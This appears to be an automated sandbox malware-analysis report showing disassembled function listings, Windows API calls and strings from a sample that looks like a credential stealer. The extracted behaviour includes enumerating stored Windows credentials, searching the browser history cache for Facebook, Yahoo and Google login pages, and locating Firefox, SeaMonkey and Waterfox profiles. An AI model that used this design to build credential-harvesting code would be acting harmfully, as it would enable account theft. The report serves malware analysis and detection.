                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                    • CloseHandle.KERNEL32(?), ref: 0040E148
                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                    • String ID: bhv
                    • API String ID: 327780389-2689659898
                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                    Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                    • API String ID: 2941347001-70141382
                    • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                    • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                    Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 702 44671d-446726 699->702 701 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->701 711 4467ac-4467b7 __setusermatherr 701->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 701->712 704 446747-44674b 702->704 705 446728-44672d 702->705 704->700 707 44674d-44674f 704->707 705->700 706 446734-44673b 705->706 706->700 709 44673d-446745 706->709 710 446755-446758 707->710 709->710 710->701 711->712 715 446810-446819 712->715 716 44681e-446825 712->716 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 720 446834-446838 718->720 721 44683a-44683e 718->721 723 446845-44684b 719->723 724 446872-446877 719->724 720->718 720->721 721->723 725 446840-446842 721->725 727 446853-446864 GetStartupInfoW 723->727 728 44684d-446851 723->728 724->719 725->723 729 446866-44686a 727->729 730 446879-44687b 727->730 728->725 728->727 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                    • String ID:
                    • API String ID: 2827331108-0
                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • wcschr.MSVCRT ref: 0040C324
                    • wcschr.MSVCRT ref: 0040C344
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • GetLastError.KERNEL32 ref: 0040C373
                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                    • String ID: visited:
                    • API String ID: 1157525455-1702587658
                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                    • memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                    • _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                    • API String ID: 3883404497-2982631422
                    • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                    • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                    Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                    • memset.MSVCRT ref: 0040BC75
                    • memset.MSVCRT ref: 0040BC8C
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                    • memcmp.MSVCRT ref: 0040BCD6
                    • memcpy.MSVCRT ref: 0040BD2B
                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                    • String ID:
                    • API String ID: 509814883-3916222277
                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                    Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                    APIs
                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                    • GetLastError.KERNEL32 ref: 0041847E
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: CreateFile$??3@ErrorLast
                    • String ID: |A
                    • API String ID: 1407640353-1717621600
                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                    Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                    • String ID: r!A
                    • API String ID: 2791114272-628097481
                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                    • wcslen.MSVCRT ref: 0040C82C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                    • API String ID: 62308376-4196376884
                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                    • wcslen.MSVCRT ref: 0040BE06
                    • _wcsncoll.MSVCRT ref: 0040BE38
                    • memset.MSVCRT ref: 0040BE91
                    • memcpy.MSVCRT ref: 0040BEB2
                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                    • wcschr.MSVCRT ref: 0040BF24
                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                    • String ID:
                    • API String ID: 3191383707-0
                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403CBF
                    • memset.MSVCRT ref: 00403CD4
                    • memset.MSVCRT ref: 00403CE9
                    • memset.MSVCRT ref: 00403CFE
                    • memset.MSVCRT ref: 00403D13
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403DDA
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Waterfox$Waterfox\Profiles
                    • API String ID: 3527940856-11920434
                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403E50
                    • memset.MSVCRT ref: 00403E65
                    • memset.MSVCRT ref: 00403E7A
                    • memset.MSVCRT ref: 00403E8F
                    • memset.MSVCRT ref: 00403EA4
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 00403F6B
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                    • API String ID: 3527940856-2068335096
                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403FE1
                    • memset.MSVCRT ref: 00403FF6
                    • memset.MSVCRT ref: 0040400B
                    • memset.MSVCRT ref: 00404020
                    • memset.MSVCRT ref: 00404035
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                    • memset.MSVCRT ref: 004040FC
                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                    • API String ID: 3527940856-3369679110
                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                    • API String ID: 3510742995-2641926074
                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 004033B7
                    • memcpy.MSVCRT ref: 004033D0
                    • wcscmp.MSVCRT ref: 004033FC
                    • _wcsicmp.MSVCRT ref: 00403439
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                    • String ID: $0.@
                    • API String ID: 3030842498-1896041820
                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
